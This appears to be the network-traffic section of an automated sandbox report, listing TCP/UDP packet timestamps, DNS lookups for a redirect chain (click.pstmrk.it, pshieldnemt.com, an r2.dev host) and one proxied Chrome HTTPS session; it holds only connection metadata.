Jan 15, 2025 15:34:55.865950108 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.865988016 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.865998030 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.866003990 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.866071939 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.866138935 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.866602898 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.866671085 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.866673946 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.866684914 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.866729975 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.866739988 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.866785049 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.866786003 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.866796970 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.866836071 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.867238998 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.867296934 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.867302895 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.867408991 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.867427111 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.867434978 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.867460966 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.867503881 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.867573023 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.867578983 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.867623091 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.867629051 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.867640018 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.867672920 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.867691040 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.867733955 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.867742062 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.867793083 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.868298054 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.868347883 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.868366957 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.868371964 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.868426085 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.868479967 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.868544102 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.868546009 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.868554115 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.868586063 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.868597031 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.869112968 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.869174957 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.869226933 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.869297981 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.951870918 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.952019930 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.952042103 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.952073097 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.952105999 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.952188969 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.952231884 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.952256918 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.952271938 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.952307940 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.952610016 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.952698946 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.952713013 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.952735901 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.952811956 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.952824116 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.953213930 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.953258038 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.953298092 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.953310966 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.953341961 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.957365990 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.957416058 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.957458019 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.957472086 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.957508087 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.957815886 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.957855940 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.957901955 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.957914114 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.957940102 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.958208084 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.958249092 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.958268881 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.958281994 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.958312988 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.958978891 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.959018946 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.959074020 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:55.959093094 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:55.959116936 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.012428999 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.039352894 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.039418936 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.039473057 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.039490938 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.039520025 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.039550066 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.039580107 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.039625883 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.039658070 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.039670944 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.039697886 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.039727926 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.039990902 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.040033102 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.040072918 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.040086031 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.040139914 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.040139914 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.040505886 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.040548086 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.040592909 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.040605068 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.040631056 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.040666103 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.040894985 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.040936947 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.040985107 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.040999889 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.041023970 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.041183949 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.041260004 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.041268110 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.041290045 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.041292906 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.041338921 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.041361094 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.041532993 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.041605949 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.041613102 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.041634083 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.041663885 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.041702032 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.041717052 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.041743994 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.041810989 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.041877985 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.042045116 CET	49721	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.042076111 CET	443	49721	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.075170040 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.119343996 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.277911901 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.277971983 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.278019905 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.278053045 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.278064013 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.278079987 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.278139114 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.278170109 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.278232098 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.278235912 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.278249025 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.278294086 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.278310061 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.278558969 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.278672934 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.278688908 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.328448057 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.328466892 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.370831966 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.370879889 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.370910883 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.370932102 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.370987892 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.371002913 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.371057987 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.371109962 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.371123075 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.371138096 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.371191978 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.371242046 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.371257067 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.371279955 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.371330023 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.371357918 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.371500015 CET	49720	443	192.168.2.17	172.66.0.235
Jan 15, 2025 15:34:56.371527910 CET	443	49720	172.66.0.235	192.168.2.17
Jan 15, 2025 15:34:56.454689026 CET	49680	443	192.168.2.17	20.189.173.13
Jan 15, 2025 15:34:56.771083117 CET	49680	443	192.168.2.17	20.189.173.13
Jan 15, 2025 15:34:56.821739912 CET	49675	443	192.168.2.17	204.79.197.203
Jan 15, 2025 15:34:57.374474049 CET	49680	443	192.168.2.17	20.189.173.13
Jan 15, 2025 15:34:58.587568045 CET	49680	443	192.168.2.17	20.189.173.13
Jan 15, 2025 15:35:01.001482964 CET	49680	443	192.168.2.17	20.189.173.13
Jan 15, 2025 15:35:01.624644995 CET	49675	443	192.168.2.17	204.79.197.203
Jan 15, 2025 15:35:03.679800987 CET	443	49717	142.250.185.132	192.168.2.17
Jan 15, 2025 15:35:03.679888010 CET	443	49717	142.250.185.132	192.168.2.17
Jan 15, 2025 15:35:03.679954052 CET	49717	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:35:04.630439997 CET	49717	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:35:04.630475044 CET	443	49717	142.250.185.132	192.168.2.17
Jan 15, 2025 15:35:04.916693926 CET	49682	80	192.168.2.17	192.229.211.108
Jan 15, 2025 15:35:05.220544100 CET	49682	80	192.168.2.17	192.229.211.108
Jan 15, 2025 15:35:05.812526941 CET	49680	443	192.168.2.17	20.189.173.13
Jan 15, 2025 15:35:05.828566074 CET	49682	80	192.168.2.17	192.229.211.108
Jan 15, 2025 15:35:07.042531013 CET	49682	80	192.168.2.17	192.229.211.108
Jan 15, 2025 15:35:09.457540035 CET	49682	80	192.168.2.17	192.229.211.108
Jan 15, 2025 15:35:11.229651928 CET	49675	443	192.168.2.17	204.79.197.203
Jan 15, 2025 15:35:14.264717102 CET	49682	80	192.168.2.17	192.229.211.108
Jan 15, 2025 15:35:15.415105104 CET	49680	443	192.168.2.17	20.189.173.13
Jan 15, 2025 15:35:21.527069092 CET	49691	443	192.168.2.17	204.79.197.200
Jan 15, 2025 15:35:21.532201052 CET	443	49691	204.79.197.200	192.168.2.17
Jan 15, 2025 15:35:21.622132063 CET	443	49691	204.79.197.200	192.168.2.17
Jan 15, 2025 15:35:21.622287035 CET	49691	443	192.168.2.17	204.79.197.200
Jan 15, 2025 15:35:21.623655081 CET	49691	443	192.168.2.17	204.79.197.200
Jan 15, 2025 15:35:21.623836994 CET	49691	443	192.168.2.17	204.79.197.200
Jan 15, 2025 15:35:21.624111891 CET	49691	443	192.168.2.17	204.79.197.200
Jan 15, 2025 15:35:21.624228954 CET	49691	443	192.168.2.17	204.79.197.200
Jan 15, 2025 15:35:21.628555059 CET	443	49691	204.79.197.200	192.168.2.17
Jan 15, 2025 15:35:21.628739119 CET	443	49691	204.79.197.200	192.168.2.17
Jan 15, 2025 15:35:21.628814936 CET	443	49691	204.79.197.200	192.168.2.17
Jan 15, 2025 15:35:21.628911972 CET	443	49691	204.79.197.200	192.168.2.17
Jan 15, 2025 15:35:21.629029036 CET	443	49691	204.79.197.200	192.168.2.17
Jan 15, 2025 15:35:21.716089964 CET	443	49691	204.79.197.200	192.168.2.17
Jan 15, 2025 15:35:21.716202021 CET	49691	443	192.168.2.17	204.79.197.200
Jan 15, 2025 15:35:21.716304064 CET	49691	443	192.168.2.17	204.79.197.200
Jan 15, 2025 15:35:21.721206903 CET	443	49691	204.79.197.200	192.168.2.17
Jan 15, 2025 15:35:21.808250904 CET	443	49691	204.79.197.200	192.168.2.17
Jan 15, 2025 15:35:21.808368921 CET	49691	443	192.168.2.17	204.79.197.200
Jan 15, 2025 15:35:23.871994972 CET	49682	80	192.168.2.17	192.229.211.108
Jan 15, 2025 15:35:33.919851065 CET	49699	80	192.168.2.17	2.22.50.144
Jan 15, 2025 15:35:33.925510883 CET	80	49699	2.22.50.144	192.168.2.17
Jan 15, 2025 15:35:33.925610065 CET	49699	80	192.168.2.17	2.22.50.144
Jan 15, 2025 15:35:35.649571896 CET	49701	443	192.168.2.17	40.126.32.76
Jan 15, 2025 15:35:35.649640083 CET	49701	443	192.168.2.17	40.126.32.76
Jan 15, 2025 15:35:35.654416084 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:35.654515982 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:35.654545069 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:35.654596090 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:35.654623032 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:36.042388916 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:36.042407036 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:36.042431116 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:36.042445898 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:36.042460918 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:36.042462111 CET	49701	443	192.168.2.17	40.126.32.76
Jan 15, 2025 15:35:36.042515039 CET	49701	443	192.168.2.17	40.126.32.76
Jan 15, 2025 15:35:36.042773962 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:36.042819023 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:36.042821884 CET	49701	443	192.168.2.17	40.126.32.76
Jan 15, 2025 15:35:36.043100119 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:36.043116093 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:36.043133020 CET	443	49701	40.126.32.76	192.168.2.17
Jan 15, 2025 15:35:36.043212891 CET	49701	443	192.168.2.17	40.126.32.76
Jan 15, 2025 15:35:36.043212891 CET	49701	443	192.168.2.17	40.126.32.76
Jan 15, 2025 15:35:53.165049076 CET	49727	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:35:53.165126085 CET	443	49727	142.250.185.132	192.168.2.17
Jan 15, 2025 15:35:53.165349960 CET	49727	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:35:53.165659904 CET	49727	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:35:53.165682077 CET	443	49727	142.250.185.132	192.168.2.17
Jan 15, 2025 15:35:53.811168909 CET	443	49727	142.250.185.132	192.168.2.17
Jan 15, 2025 15:35:53.811674118 CET	49727	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:35:53.811711073 CET	443	49727	142.250.185.132	192.168.2.17
Jan 15, 2025 15:35:53.812221050 CET	443	49727	142.250.185.132	192.168.2.17
Jan 15, 2025 15:35:53.812630892 CET	49727	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:35:53.812726021 CET	443	49727	142.250.185.132	192.168.2.17
Jan 15, 2025 15:35:53.867882013 CET	49727	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:36:03.726483107 CET	443	49727	142.250.185.132	192.168.2.17
Jan 15, 2025 15:36:03.726629972 CET	443	49727	142.250.185.132	192.168.2.17
Jan 15, 2025 15:36:03.726818085 CET	49727	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:36:04.626492023 CET	49727	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:36:04.626573086 CET	443	49727	142.250.185.132	192.168.2.17
Jan 15, 2025 15:36:23.057219028 CET	49698	443	192.168.2.17	40.126.32.76
Jan 15, 2025 15:36:23.062345982 CET	443	49698	40.126.32.76	192.168.2.17
Jan 15, 2025 15:36:23.062453985 CET	49698	443	192.168.2.17	40.126.32.76
Jan 15, 2025 15:36:53.222162008 CET	49729	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:36:53.222210884 CET	443	49729	142.250.185.132	192.168.2.17
Jan 15, 2025 15:36:53.222346067 CET	49729	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:36:53.222666979 CET	49729	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:36:53.222681046 CET	443	49729	142.250.185.132	192.168.2.17
Jan 15, 2025 15:36:53.872066021 CET	443	49729	142.250.185.132	192.168.2.17
Jan 15, 2025 15:36:53.872427940 CET	49729	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:36:53.872461081 CET	443	49729	142.250.185.132	192.168.2.17
Jan 15, 2025 15:36:53.872915983 CET	443	49729	142.250.185.132	192.168.2.17
Jan 15, 2025 15:36:53.873219013 CET	49729	443	192.168.2.17	142.250.185.132
Jan 15, 2025 15:36:53.873346090 CET	443	49729	142.250.185.132	192.168.2.17
Jan 15, 2025 15:36:53.923989058 CET	49729	443	192.168.2.17	142.250.185.132

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 15:34:48.341511965 CET	53	50111	1.1.1.1	192.168.2.17
Jan 15, 2025 15:34:48.442265034 CET	53	61764	1.1.1.1	192.168.2.17
Jan 15, 2025 15:34:49.043579102 CET	64944	53	192.168.2.17	1.1.1.1
Jan 15, 2025 15:34:49.043802023 CET	50457	53	192.168.2.17	1.1.1.1
Jan 15, 2025 15:34:49.051403046 CET	53	50457	1.1.1.1	192.168.2.17
Jan 15, 2025 15:34:49.053270102 CET	53	64944	1.1.1.1	192.168.2.17
Jan 15, 2025 15:34:49.412527084 CET	53	57460	1.1.1.1	192.168.2.17
Jan 15, 2025 15:34:52.473640919 CET	63621	53	192.168.2.17	1.1.1.1
Jan 15, 2025 15:34:52.473892927 CET	54925	53	192.168.2.17	1.1.1.1
Jan 15, 2025 15:34:52.660973072 CET	53	54925	1.1.1.1	192.168.2.17
Jan 15, 2025 15:34:52.796730995 CET	53	63621	1.1.1.1	192.168.2.17
Jan 15, 2025 15:34:53.111860991 CET	54654	53	192.168.2.17	1.1.1.1
Jan 15, 2025 15:34:53.112117052 CET	52133	53	192.168.2.17	1.1.1.1
Jan 15, 2025 15:34:53.118706942 CET	53	54654	1.1.1.1	192.168.2.17
Jan 15, 2025 15:34:53.119054079 CET	53	52133	1.1.1.1	192.168.2.17
Jan 15, 2025 15:34:54.878113985 CET	59840	53	192.168.2.17	1.1.1.1
Jan 15, 2025 15:34:54.878243923 CET	59116	53	192.168.2.17	1.1.1.1
Jan 15, 2025 15:34:54.890309095 CET	53	59116	1.1.1.1	192.168.2.17
Jan 15, 2025 15:34:54.891737938 CET	53	59840	1.1.1.1	192.168.2.17
Jan 15, 2025 15:35:06.411900997 CET	53	55550	1.1.1.1	192.168.2.17
Jan 15, 2025 15:35:25.207592964 CET	53	58934	1.1.1.1	192.168.2.17
Jan 15, 2025 15:35:48.180272102 CET	53	52707	1.1.1.1	192.168.2.17
Jan 15, 2025 15:35:48.341989994 CET	53	52220	1.1.1.1	192.168.2.17
Jan 15, 2025 15:35:53.683475971 CET	138	138	192.168.2.17	192.168.2.255
Jan 15, 2025 15:36:18.498809099 CET	53	52482	1.1.1.1	192.168.2.17

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 15:34:49.043579102 CET	192.168.2.17	1.1.1.1	0xd449	Standard query (0)	click.pstmrk.it	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:34:49.043802023 CET	192.168.2.17	1.1.1.1	0x65fe	Standard query (0)	click.pstmrk.it	65	IN (0x0001)	false
Jan 15, 2025 15:34:52.473640919 CET	192.168.2.17	1.1.1.1	0xded2	Standard query (0)	pshieldnemt.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:34:52.473892927 CET	192.168.2.17	1.1.1.1	0xc03a	Standard query (0)	pshieldnemt.com	65	IN (0x0001)	false
Jan 15, 2025 15:34:53.111860991 CET	192.168.2.17	1.1.1.1	0xac25	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:34:53.112117052 CET	192.168.2.17	1.1.1.1	0x6e03	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 15, 2025 15:34:54.878113985 CET	192.168.2.17	1.1.1.1	0xcf4e	Standard query (0)	pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:34:54.878243923 CET	192.168.2.17	1.1.1.1	0xfdcf	Standard query (0)	pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 15:34:49.053270102 CET	1.1.1.1	192.168.2.17	0xd449	No error (0)	click.pstmrk.it	63.32.154.112	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:34:49.053270102 CET	1.1.1.1	192.168.2.17	0xd449	No error (0)	click.pstmrk.it	3.248.135.167	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:34:49.053270102 CET	1.1.1.1	192.168.2.17	0xd449	No error (0)	click.pstmrk.it	54.75.221.170	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:34:52.796730995 CET	1.1.1.1	192.168.2.17	0xded2	No error (0)	pshieldnemt.com	188.40.248.200	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:34:53.118706942 CET	1.1.1.1	192.168.2.17	0xac25	No error (0)	www.google.com	142.250.185.132	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:34:53.119054079 CET	1.1.1.1	192.168.2.17	0x6e03	No error (0)	www.google.com		65	IN (0x0001)	false
Jan 15, 2025 15:34:54.891737938 CET	1.1.1.1	192.168.2.17	0xcf4e	No error (0)	pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev	172.66.0.235	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:34:54.891737938 CET	1.1.1.1	192.168.2.17	0xcf4e	No error (0)	pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev	162.159.140.237	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

click.pstmrk.it

pshieldnemt.com

https:

pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.17	49708	63.32.154.112	443	7152	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
